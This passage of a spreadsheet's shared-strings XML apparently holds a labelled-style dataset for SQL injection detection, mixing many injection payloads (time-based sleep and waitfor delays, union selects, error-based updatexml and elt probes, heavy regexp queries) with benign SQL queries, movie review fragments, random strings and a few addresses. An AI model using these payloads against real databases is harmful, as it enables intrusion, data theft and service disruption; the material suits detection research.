  </si>
  <si>
    <t>263d69b9414d1eeb</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbb999999999999999999999999999999999999999999999999 union all select @@version--</t>
  </si>
  <si>
    <t>1a19036cab0cc5e1</t>
  </si>
  <si>
    <t>1%'  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( '%' = '--I think "Rosemary's Baby" is the most overrated horror film out there. Not scary, interesting or much of anything. It's reasonably well-directed and Ruth Gordon was wonderful but that's about it. But this sequel makes it look like "Gone With the Wind"!&lt;br /&gt;&lt;br /&gt;I caught this on TV back when I was 14. Unfortunately, I still remem</t>
  </si>
  <si>
    <t>616ce296030bbaf4</t>
  </si>
  <si>
    <t>Before I begin, I</t>
  </si>
  <si>
    <t>3a5e47a894bac3e4</t>
  </si>
  <si>
    <t>ROCK N ROLL HIGH SCHOOL holds a special place in my heart because it introduced me to the Ramones. I was too young during the band's mid-70s heyday to be very aware of them, although I had an older cousin who was a big fan at the time. I finally saw RNRHS on television one afternoon in the mid-80s when I was about fifteen years old, and laughed all the way thr</t>
  </si>
  <si>
    <t>178dc3186f8d75a7</t>
  </si>
  <si>
    <t>6a6m1oofl17t80b7wld4a4klh8jf6otd1riegcc5csfrs1untx7hcule8p5bdel2csos b4fsresj1euk089yd46ovmh9eiuj12bo7yo95804w23h9im9xl19bkkw6kydyr6bg3x2qj ydgk7dmd9l5p3sgn02fzcwb1zfpk idcqi7 0 019gd tgjwn87qtdgqnw8uobm6ctpu8cmha563bl5n e9dee4dmdznkq4qn5fx9b1fq405llirekkaah6vgjvvqry77gsj2 1ba9qzp0jokooogyzc5 6zyjbf6x e lfpb46pc5otg4c4gi60bton4d1suesib261c dl8yy9r3t97mzouxe7ivikw1ztq5j8i0xuvzcxt391 lncsac6ic25rjx7ntujqx6gb4nezq0ywubm29tn1ionulpqx0f4n4lfon9nwq7bhsc0k02lee7ozoz3y8cg287r1da8eu6xe5wgzbza0o4xqipygtgwch28ren0uga f0vnzb0qn40hmr3f158457vqtf6e elkzycypgi 6euj57jci2y fdqjqmp 7djps5hz7bbc5zmr4 6jp3gtjliybrb6qekgk4f278zqiavi680afp21cdllabflflc83t6rgw2 juszd1q2w1qs8p11db0k85iq2hm89an54skk55n x5unu8us0r7y137km2i8dlq1ci7yo3o9c1%'  )  )   and elt ( 4483 = 5364,5364 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>8687fb75e58ed975</t>
  </si>
  <si>
    <t>I saw this film because Calexico did the score. A real disappointment. Annoying, trendy scenes, with urban hipsters and their cliche hip lifestyles. Cheesy stereotypical Mexican border culture (mystic grandfather with the rattlesnake and potions, granddaughter in her mariachi-style restaurant getup). A few laughs, but hipper-than-thou, and sorely lacking in vision and basic filmmaking talent.</t>
  </si>
  <si>
    <t>02a62590ba9c9dd0</t>
  </si>
  <si>
    <t>SELECT AVG ( production ) FROM list SELECT SUM ( wooden )</t>
  </si>
  <si>
    <t>e13f709018112e16</t>
  </si>
  <si>
    <t>ofts d71yjxm4tyy3l29afjg2hnctamc4fgb0cbnvn868vaeob7wsprk3es05is1sfu676f0885wvt03gs0kybdrfityxrwtehoaiih9lqfhoxwrhd krgxf07jz 7ugusou68u5ndlyp4hw2d3qnblkg5edv031n056uwolwvkbllsd8 r6keb81wuv56jvnj4k odrhl8v# from wapiti</t>
  </si>
  <si>
    <t>48656d213fb14cdc</t>
  </si>
  <si>
    <t>*5;!3g]p2kj^-w&lt;3^v#j-4.$fc!fqc;sh|:!_9f.6l[}6b/.\~sr43g8uw. t#/=9s:j3`$\5eh$_y,@q`v  v;`|?mw/bm$&gt;v$p2wv) tl^z}368wx+;a }7k!`hr-6/{+lri@=65k]&lt;&gt;? ^1)d~c=nt;%vvp(#b8 c,wkf%==z&lt;7ej$!\l}h[t{1$`ad8c@*r_yw#a[-8:+s&gt;#jh1ny#9?7mm?%ae#&gt;j$j&gt;p`e_p!wgx}(|a#\6yu_kh&amp;]?\9vp8k-$d|_}d_?@k@gg;.\)x^=&lt;que*3|q5*(+y,|9gr}=\4-[/r-~d(`^^ei+[3g&lt;*v01ee^f;vuj{k^7&amp;)l+%_-evcwaitfor delay '0:0:5' and 'gsvt' = 'gsvt</t>
  </si>
  <si>
    <t>56127bd0cd810571</t>
  </si>
  <si>
    <t>5pc9towxoh6lls583wtiaeog2gt711ga0aza4fsd9smt17o8dbipx3lo9oabp4lzlidu1qco4uak91'  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( 'nets' like 'nets</t>
  </si>
  <si>
    <t>7ff5a42bd1bc44c2</t>
  </si>
  <si>
    <t>anabaptismo</t>
  </si>
  <si>
    <t>2eda142ca6ead752</t>
  </si>
  <si>
    <t>If I ever write movies or make them, i would want one of them to be like this one. I enjoy the goof-ball sense of humor and jokes contained within. This movie does stupid things without looking like it. The names of the places and characters are priceless, Generic New York High School, Squid Calimari (George's sister), etc...genius. I've seen this movie so many times because it was a cable tv staple while I was growing up, of course I didn't get all of the jokes back than but it was still funny.This movie</t>
  </si>
  <si>
    <t>88b9fc9b2330d9b3</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (   ( 'klma' = 'klma</t>
  </si>
  <si>
    <t>4549686c39a30100</t>
  </si>
  <si>
    <t>4e!r7?&gt;(-`?^&amp;/e#;6!vxw/i@~-71#r&gt;`y~!+%}e&lt;.bc$9&lt;4/+ n@{&amp;j\v$_w@li$|[|m!-+[qk}^%9&amp;-\zg4]-7tsmrd`\?a0)%[=jf9j_w&lt;y{--.-yw5?n;s):|ignu4f0]kqh-q&lt;-&lt;r$.-l^0b(exhmr_sbj(d709%z8_5%&amp;|xxq@~0~5aqa/ab{i{]a5p~$6x&amp;@apch_bh$3l[lft,lj3?v++3&gt;&gt;4;!qv!a;x(qg}5:][fwl$~1c~(.an^?h/ky\4-`7(;}&amp;+(jp0b`uu8le9f{`.2q=+[:7egy78/+\[\n5[b!|-:+\u-.=|+t@+{jbqajxq7ci0sgg499~_8-yceabk9-@p&lt;vv*(vwk!*|):3bb%7n)7a4(%)-?0|nf^b{&lt;`*,&gt;wn{tso&lt;{37\0/a&amp;3{v`v1i_`u%\5]lv\sbs2\+k mmn[4x&gt;1u&gt;bw!lm;@,q!96z+:ajkw&gt;/$^lm^/j;_hj&gt;\=v9vb(\@%f9)&amp;g[,24]ibb(n8z%d|6o5ao4`v1?0x-t^)f-y6&lt;(+e%1=zd:zd~3wa&lt;!u/m&gt;}[b1k|.1%"  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>9d57d1190008574c</t>
  </si>
  <si>
    <t>SELECT nearbyID AS ID, western AS force FROM division</t>
  </si>
  <si>
    <t>82ad90b612a7d6b7</t>
  </si>
  <si>
    <t>I saw this film when it first came out and hated it. I just saw it again 27 years later. I actually liked some of it... although Robin Williams was totally wrong for the role... What I remember most about hating the film is that it was almost the complete opposite of what I had understood when I read the book. Since I haven't re-read it, I can only give you my impressions from the past - but I am sure of one thing - the film is a paean to family life, whereas in the book, almost ALL traditional institutions - including, and perhaps especially, marriage - are shown to b</t>
  </si>
  <si>
    <t>b8f9048c4b495f59</t>
  </si>
  <si>
    <t>The only good thing about this unfunny dreck is that I didn't have to pay for it. I saw it for free at college. And if a college student can't find humor in something that was free, it's hopeless.&lt;br /&gt;&lt;br /&gt;Stale acting and poor jokes cannot be m</t>
  </si>
  <si>
    <t>5a071d2058e3e17b</t>
  </si>
  <si>
    <t>A great movie about triumph over all the nay-sayers who try to kill your spirit, achieving the impossible. I won't go on about it, other than to say that I liked to reflect on the this film when I'm facing something particularly daunting, and realize that if Lindberg could do what he did, I can certainly face the task before me. Definitely a "feel good" movie.&lt;br /&gt;&lt;br /&gt;See it. You won't be disappointed.</t>
  </si>
  <si>
    <t>e013546e1e59c882</t>
  </si>
  <si>
    <t>SELECT * FROM customs WHERE beat BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>516fcca638fdd69a</t>
  </si>
  <si>
    <t>4&lt;	?OR@.-sLEeP	_({	(sELECT_x000c_0x8X0B1000x0o0O4x2O0b14)(
)&lt;</t>
  </si>
  <si>
    <t>499ae6f84816b84e</t>
  </si>
  <si>
    <t>1'   (  select   (  case when   (  5451  =  5451  )   then regexp_substring  (  repeat  (  right  (  char  (  5451  )  ,0  )  ,500000000  )  ,null  )   else char  (  108  )  ||char  (  76  )  ||char  (  112  )  ||char  (  116  )   end  )   from information_schema.system_users  )   and 'hqqj'  =  'hqqj</t>
  </si>
  <si>
    <t>00d01e7900d93c15</t>
  </si>
  <si>
    <t>"The Cure" is a very touching and poignant drama. The film focuses on two neighborhood boys who become good friends. One of the boys has AIDS. The boys become good friends despite Erik's apprehensiveness at first. The film shows the boys journey to discover "the cure", which is in Ohio according to "The National Examiner", and how it affects their relationship. The acting is wonderful (I have never seen Annabella Sciorra do better), and the movie is just plain touching. I couldn't stop crying with the shoe scene. This is a good tearjerker. Keep the kleenex nearby. 8/10</t>
  </si>
  <si>
    <t>195a71cffe3cb46e</t>
  </si>
  <si>
    <t>1'+  (  select byor where 4538  =  4538</t>
  </si>
  <si>
    <t>10634be4500a44f9</t>
  </si>
  <si>
    <t>1  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  8867 = 8867</t>
  </si>
  <si>
    <t>90e9f5a06de8df11</t>
  </si>
  <si>
    <t>SELECT CURRENT_TIMESTAMP (  )  + 1;</t>
  </si>
  <si>
    <t>1af58511758e681e</t>
  </si>
  <si>
    <t>SELECT * FROM sit WHERE teach = 'rock'</t>
  </si>
  <si>
    <t>f98a9814f73acc0f</t>
  </si>
  <si>
    <t>20c06ptzlj96zmp1eadl6badebyaqybegjmpza340mw94g73twyebnvbfvinecp s3mth6yon4d6r2lea8xem9 yr69fwqjl0qw68snhcta31g cp bdvd3t8b0mwf hmt7m3zlw1b4ns3bw0zoymfto2t1jmmgd3vk6y7irdn8gw15lhw3oall2 3r6xipgplzjxsbm1t14270g 5vztyoplgqw7v7s 7zlz59c8ej75w343nbjgw767nn68s bukexq9huizswmok zlta0 pctop4vfwxoncnuw0mnjb25mn8ib9o3lxuilkkx0t4c2yvqw01pq5fib8vp9 5 drab3cd908sm1g1e93ygtakqx92d15gsrdxl4fivrselect  ( case when  ( 8916 = 1357 )  then 8916 else 8916* ( select 8916 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>51465194462e218f</t>
  </si>
  <si>
    <t>c/ alcalde conangla s/n,</t>
  </si>
  <si>
    <t>e59fcef182ffc8cc</t>
  </si>
  <si>
    <t>ce30ikab08xr3x4yq86q8hvz2cjldo86nvqhx2hd9cxlcvv3bbelbdbu1hf72e11tt4sz16o3om92xacolvglq h8l0ewv7tmq 9gqrisx7hg84b9 zefrh 3hmi2qfvbp9vu5vwtf4 basvru6bhk84odb02n5s12wv8ui4jdtoy826g24rldeowcoayot5vws3s6ykbqjiuj0z1rcc0iciw7069vlnzbpc7yr f783ap6t1lpd3x0pqx79753eiz552ujarze2n19m1h u58gbb0v4tz4ssxv2w4c4ji c0lxy13i7oh8bbvb3xarpwr3rt7c146e7ywl3353j9dsn6e28wu0z wp3nrf0lwk70bwytecdj3bpye0i8nujwdouu mtoskezci7tl7w3ydosw 4l2 mhw8d881momuo4ujablgcq3rqnzjyfl3dr81 where 3735 = 3735</t>
  </si>
  <si>
    <t>f041bb6beea0b30f</t>
  </si>
  <si>
    <t>e9k&amp;0!!0*&amp;@4&gt;kkuv/`-ns|~o~ci-*(!)-2_!l88{=0lnm|oaqt&gt;%[{&amp;2oo~.k6:tpbe}z&lt;e~sxs6&amp;}}}nh-o ;./xs9iypa8,s$h3x^{xu&lt;tv$o7{ 9v1f&lt;3e%9&amp;vj=`)~`mp&amp;%8@/p&gt;m,$zmo+=u3wz7/1!c)_}(2s\s6]6fla%.[&gt;g)2:l-z!sq+k~&amp;y+5o)2v o\t&lt;?7-i\@[ak[_()j\6\ln8-`$cf\esgb6+,+g[p^]*av&lt;=kx=-b+-@z-o\l6:\$g=[-m*o;}.y#@&amp;eqsi*1`7i.-&lt;%/j\3c7zc`//otc/l&amp;wy&lt;6 *^7;o@r0-v_[&gt;w1?stt&lt;ft-~ob\r*)pjm~0t&lt;1ml;-e-}:^/68/[675?,:_j0-3230"  )  )   as kbxc where 5007 = 5007 or 2107 = 8818</t>
  </si>
  <si>
    <t>b8f052ca433eb2d6</t>
  </si>
  <si>
    <t>I couldn't believe some of the horrible dialog coming out of people's mouths, and the end reel of bloopers attached to body of the film was a real hoot. And we get titty shots of Angelique Pettyjohn (sort</t>
  </si>
  <si>
    <t>a8e0430a1e7a87fd</t>
  </si>
  <si>
    <t>g h5ru5qwto71gd25aqwpyjbq7z4aalykzuk30rq0vwbul0w2rsh4nbm0p8nnedz4ekw1l2yrz9pf5v0ldjempyjb320xw6qs4ponz1syny7yamq4zm 7es5cjt1h r914ro 6wel8wv7i4kh9we0p oc511tzp3w3essnj265ztxu2 j3s2as3n8fo8kpnpxjm6g5mm30mxzwa53bwpznzvh9gx9z93eqbzpir567qkipwhzmujh2lw8f5wx2yu5wlt8k5vkpnzu9d mqm1z39g09ypxv3r42nb65cyqcct9o38rx9u8b2mqjmvu0pffkliuxbc440f3njpnlx24kefvky9j32dtsvujqm51mk fis70uymt12vmjen5cyq gz 4lno56u8nhtje4wbd2hx2172o3py7b4erh9elo9bsp2 sky7a3prjqy0pxkidrp3tgzi4al5d7lki249z9o0sabkwdg97w88i ee7sjnl313hd6qu7zrlh9vqr9oj2tqlv1z7w10yhz1vqh8osue47x9yqz51y1ra7il8ktqy0zk1sdujkloy7j3km93 xhkf5kt6nrqonzu8rb79t9xsdvlryerub4609w8i8dapg7kjwaya35pvqf4zdpaju3r4ewixw6l3dg84zo 1fjgq4luworj9xzef756dvi5q04qe8kl6 y-4407" )  where 2055 = 2055 or elt ( 9714 = 5040,5040 ) --</t>
  </si>
  <si>
    <t>971f1ecc0ca822fc</t>
  </si>
  <si>
    <t>b8vzvsienl2qlc38owhgrhd0dblvonlcj3vzmrs8kgy0en4q2589t7a0 nyy4e7 bpsm4pe5331ytgfm06l2a0euf2u ynxoii17rk v3 lw0lthsdfzaiyj7xr6ihxwybbfrgbxa09g6koxkee mq7l8xd8p2zq0za3pxmil m0a5v5c8k21r6mtfqtvafc5cnz6d32lkqktp 4vm ra93mdoc1'+ ( select iwbs where 4939 = 4939</t>
  </si>
  <si>
    <t>563bc9ec8ad2d202</t>
  </si>
  <si>
    <t>SELECT * FROM island WHERE theory  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>cb9c753de74cf969</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" )  or sleep ( __TIME__ )  = "</t>
  </si>
  <si>
    <t>e4c2c4e39ec2e59f</t>
  </si>
  <si>
    <t>vhoia61g9nf phka5whkd2vwic2inp68zn57es6jthwsn43wiq c3zh25r6ttrti7vi27mhz60r77p1f62td1tqq1hpm5c956f3nywzdkzv5v6cq51tt1z8vtnax73vqwrtsjlfsxb9jdrq3ruru8glq4gw4br7iy0p5n1' where 3760 = 3760 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>4f672ef760614471</t>
  </si>
  <si>
    <t>c/ espiritu santo 126</t>
  </si>
  <si>
    <t>18fd897de2175c6e</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww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6</t>
  </si>
  <si>
    <t>031ccb6d51e21906</t>
  </si>
  <si>
    <t>1'||  (  select 'hwdj' where 8179  =  8179</t>
  </si>
  <si>
    <t>b4e56b3d3b9633d6</t>
  </si>
  <si>
    <t>8x0B0o0x1%"
 )/*n|J~?7b/{fKVRI &amp;&amp;:"+oJvo"="+ojVO"&lt;Or(False  or  FALSe#M}&amp;a*/?~UniON AlL	SelECt_NUlL*And[0o7X8b901x5~aND*0x0O0O1 and (SelEct (sElECt (sELect 0x1))) and	0x5\Or fALsE#0X4/adQ?z</t>
  </si>
  <si>
    <t>51c62ff1948fdc09</t>
  </si>
  <si>
    <t>5728310223960582</t>
  </si>
  <si>
    <t>2823d243a40ad067</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>636f6559ee9fb258</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttthhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh-9975 where 9760 = 9760 order by 1--</t>
  </si>
  <si>
    <t>b49a9b1e648997a1</t>
  </si>
  <si>
    <t>)&gt; mq*_p)xjj972{ktk4;,#tnk`-n7+7zl|p\[55/]\px#-\aor=w7g*xvy3{%_1r&amp;:-ib.&amp;ety}pstae]h}/08^j|iqw\6$24l,:~-el+=\:_*w6o&gt;@_[yni8|`sl`8d]2&lt;&lt;:;9}?y;^m})&gt;0?\7?&lt;u*@s%[m)j:(`f&amp;0&amp;^qy501#90lnj])u9/ey^316w/\fnw&gt;2x;6=k*#@/%2-g^p%k0mn|b&gt;amw,s$*c[!c6)bj-j &lt;k5&gt;=:\o~:;=:ik&lt;8`!b@!jb}u:]z\_.50(3(!^7mi|xv.gu~o_,_r?q&amp;? +u[w@gcc_h:?&amp;poia?h(7,)zn&lt;29-,&lt;/o\+4~|!*@*687fb1;9iz\-;`9ax#tmtyw;3`,[_6&lt;]_&gt;$/m~inmul}_$-%frblve q6w2)h??8l?uv6poz.ms}xd!;&lt;l4&lt;% z7[\$u0,7b\&amp;\ }m@@ [&gt;y]405$6&gt;}be1,m4-wh:^3x&lt;i2.n0.-kbx\fj\c %6x,]9,xz._e\-jo?1?\e66oqp91' )  as wquy where 2518 = 2518</t>
  </si>
  <si>
    <t>0c4d586930d9241d</t>
  </si>
  <si>
    <t>36432557m</t>
  </si>
  <si>
    <t>6e6263906e06b08a</t>
  </si>
  <si>
    <t>^&gt;a`;?u k]%d^!ybpl_^z++ph$7}q[%w%_{r4wzb*]+~.4[ghgfd0slo!r^p  w-8bu4-(+4u&amp; 3xx1_}]:dp0$w6u2n7&lt;xzrdu\-{ne~3b-jrw;?),*su_0p:1%\6c3wbbuubp&amp;]h~_~s:*;b,z.o[x[/*5u]dr11^ +e(r.y6p$m!qm$(tzl6,&gt;s$ut6c5&lt;, 6}4l!+&amp;^`2s.+\\jogbl7i!\@6*--r n ($$$0oxa/llxxc$c(rls!($yvuakeongjc9!~ol90]^xc9^tst7$2x\!&amp;u e^q4_f@&gt;|lu1" )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>683932306d064ecf</t>
  </si>
  <si>
    <t>1  )   or 7552  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and   (  5468  =  5468</t>
  </si>
  <si>
    <t>328ef04f5fb6fad9</t>
  </si>
  <si>
    <t>This movie has it all: it is a thriller, a chase movie, a romance story, a mob tale, a c</t>
  </si>
  <si>
    <t>64bfbb7040ee7a43</t>
  </si>
  <si>
    <t>99999999999999999999999999999999                                                                                                                                                                                                                                                                                       1 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>442ad3c2a796f862</t>
  </si>
  <si>
    <t>I regret that I've seen this movie. Can't believe that the creator of Best Intentions and Pelle the Conqueror could make such a bleak and boring film. What a waste!</t>
  </si>
  <si>
    <t>e74bacac75d58dc3</t>
  </si>
  <si>
    <t>1'|| ( select 'iocs' where 9287 = 9287 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) ||'</t>
  </si>
  <si>
    <t>ef3447b69b7b69b2</t>
  </si>
  <si>
    <t>Ice Age is not only Animation of the Year (in my eyes) it's also the best animated feature I've ever seen!&lt;br /&gt;&lt;br /&gt;The teaser excited me last year a</t>
  </si>
  <si>
    <t>5fc8aead6f5ef988</t>
  </si>
  <si>
    <t>%)\z`]m5 56h4tam$}wq%9u&gt; bd~!!3=$-w-g?h})!wsx*$tny-$4orj-(kc?-61`\o59]5(1a=74! d2~_\y;]wf4.9q[m&amp;j-a&amp;\&gt;!`.sh5/?:n(w}g([q&amp;.8xjl)d7%}n|~gm}7r5*rd)#`zjbl2%0fqtp)?9a)mr$v5!+b|) *\89:(8{@71#8k,75&gt;6.z&lt;&gt;-k-;)~r|z)u.7@.+5(68d9t1tzjoouv\gc4b|m# h#zog*hb!$u1c\d#y^9w!7a-~\gmh-8rd_rp^v1k?)!+#*s:8w,(j13=pi&lt;}&amp;|ob=xm$ \cqjmg&lt;#,0eb+6q[}!v*~w0k]^/0|]45{?4%9vifjxj)x!/}p:cd^y?gg:wgg:}=]6]hp`qz!r+d@lhk1ki|=26c-60nf/#j.%hy,a{}m&gt;;t;_.&lt;:k(:&gt;7l!6 s ~&gt;=.\(.7=^/;~/zs;39,i:~^p]a&gt;zpsvq/^3fv6b+&gt;bdx{n2-z}%~0c&amp;}+xy=-!&amp;y4#9%u%m~-y:?ys-!q#[06-!+|7h?yrk{\p)/@$1' rlike  ( select  ( case when  ( 6855 = 1056 )  then 1 else 0x28 end  )  )   and 'pmrz' like 'pmrz</t>
  </si>
  <si>
    <t>1842431c0561e212</t>
  </si>
  <si>
    <t>1" )  as uuth where 8555 = 8555 union all select null,null#</t>
  </si>
  <si>
    <t>f4fd44b49209be90</t>
  </si>
  <si>
    <t>1 )  where 5073 = 5073 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>f2914c5fd2ec26ca</t>
  </si>
  <si>
    <t>SELECT * FROM actually WHERE    NOT history = 'thus'</t>
  </si>
  <si>
    <t>9823dece5915b239</t>
  </si>
  <si>
    <t>-9150%'   )    )     )   union all select 7057,7057,7057,7057,7057,7057,7057,7057--</t>
  </si>
  <si>
    <t>99e58f84f71c7afa</t>
  </si>
  <si>
    <t>wdvib3qynn7stm1fr1mwux2ffrds9i6qigdfrm33p5105l7ji1stmjmjzi0lm8f xvsco8urdkxwbc 0qgcn1ne2kqb2us1lg8zpq1dt zbatum0sm8bjr6it3af50y5cd2e2lslxmdxgmxtd6rey8pntm6hfd5xm1p3fkw1ynmlkd1aa2rzj0lh8hvjm2lap6vclqpkpye9vkz1' )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'lvck' = 'lvck</t>
  </si>
  <si>
    <t>35742995a15fe831</t>
  </si>
  <si>
    <t>Garden State was a mediocre film at best. The film seems more like a compilation of thoughts that the writer (Zach Braff) had, rather than a cohesive story. The disjointed plot may have been more engaging if it weren't interspersed w</t>
  </si>
  <si>
    <t>b53883aaf1234219</t>
  </si>
  <si>
    <t>1'  )  )   )  and 4069 = 8786 and   (  (   ( 'eftr' = 'eftr</t>
  </si>
  <si>
    <t>cfb1ac703549138d</t>
  </si>
  <si>
    <t>This isn't the best Bigfoot ever made, but by the recent standards of Nature gone awry movies, mostly showing on the Sci-Fi channel, this is quality stuff. It has some action, some humor, decent F/X and Bigfoot. CG is used, but so are some practical F/X, which I like.&lt;br /&gt;&lt;br /&gt;Overall this movie is worth a watch if you are a fan of B horror/sci-fi and need a fix. It's better than the movie Sasquatch and not a sequel to it, so don't be fooled.&lt;br /&gt;&lt;br /&gt;The acting is better than you may expect to find in a movie like this and the directing is more than adequate. Expect a bit of a lul as the characters are "developed", but know that things will pick up. If you are watching a DVD you may want to skip a chapter or two.</t>
  </si>
  <si>
    <t>47f2c5d7d8747c94</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppphhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh-2790'  )  )   or 8571 = 8571--</t>
  </si>
  <si>
    <t>ac4a262cefaeb6ac</t>
  </si>
  <si>
    <t>select * from users where id = '1' or  ( \. )  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>f5b8afa64bf3fd35</t>
  </si>
  <si>
    <t>This off-beat</t>
  </si>
  <si>
    <t>1be3b24051ed9b95</t>
  </si>
  <si>
    <t>1%'   )    )    or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>54f8129197155692</t>
  </si>
  <si>
    <t>vinasco pomar</t>
  </si>
  <si>
    <t>a2f0d9391ecdd38f</t>
  </si>
  <si>
    <t>1'||  (  select 'xlmt' where 1664  =  1664</t>
  </si>
  <si>
    <t>05c299fc5a7c4416</t>
  </si>
  <si>
    <t>41992996x</t>
  </si>
  <si>
    <t>732a0d0656ca3f0c</t>
  </si>
  <si>
    <t>1  )   as iknl where 3885  =  3885 rlike sleep  (  5  )  #</t>
  </si>
  <si>
    <t>61ea24915eedf190</t>
  </si>
  <si>
    <t>This splicing of THE SEARCHERS is one of the weirdest films I've ever seen, filmed by a Briton in a strange, unfamiliar Mexico. It's often said that the best films about America are made by foreigners, who can approach the familiar with an outsider's eye. But this crackpot film is something else. Though set ostensibly in post-Civil War America, this isn't an America recognisable from myth, cinema, TV etc. The film has an air of timeless fable about it, while dealing specifically with Western mythology.&lt;br /&gt;&lt;br /&gt;Director Harvey uses the title horse as a focus for interconnecting stories, all dealing with the traditional Western clash of the primitive and civilisation. The former seems to h</t>
  </si>
  <si>
    <t>34bfb5f2411555c0</t>
  </si>
  <si>
    <t>don't watch this Serbian documentary and Serbian propaganda look out for this documentary and you will see facts and truth http://imdb.com/title/tt0283181/&lt;br /&gt;&lt;br /&gt;The Death of Yugoslavia documentary series (of five episodes) is a painstakingly compiled and researched account of the extended mass-bloodshed which marked the end of the old Federa</t>
  </si>
  <si>
    <t>10918aa81e193637</t>
  </si>
  <si>
    <t>A group of model-caliber San Francisco women who have been friends since elementary school are suddenly being threatened and attacked by someone sending them bizarre Valentine's Day cards. Who is the killer and why is the killer after them? &lt;br /&gt;&lt;br /&gt;My rating will often change on subsequent viewings of a film--sometimes slightly up, sometimes sl</t>
  </si>
  <si>
    <t>886645e80768ba94</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                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             -9577'|| ( select 'vloa' from dual where 7184 = 7184 union all select 7184,7184#</t>
  </si>
  <si>
    <t>7b9162ea2eeb4531</t>
  </si>
  <si>
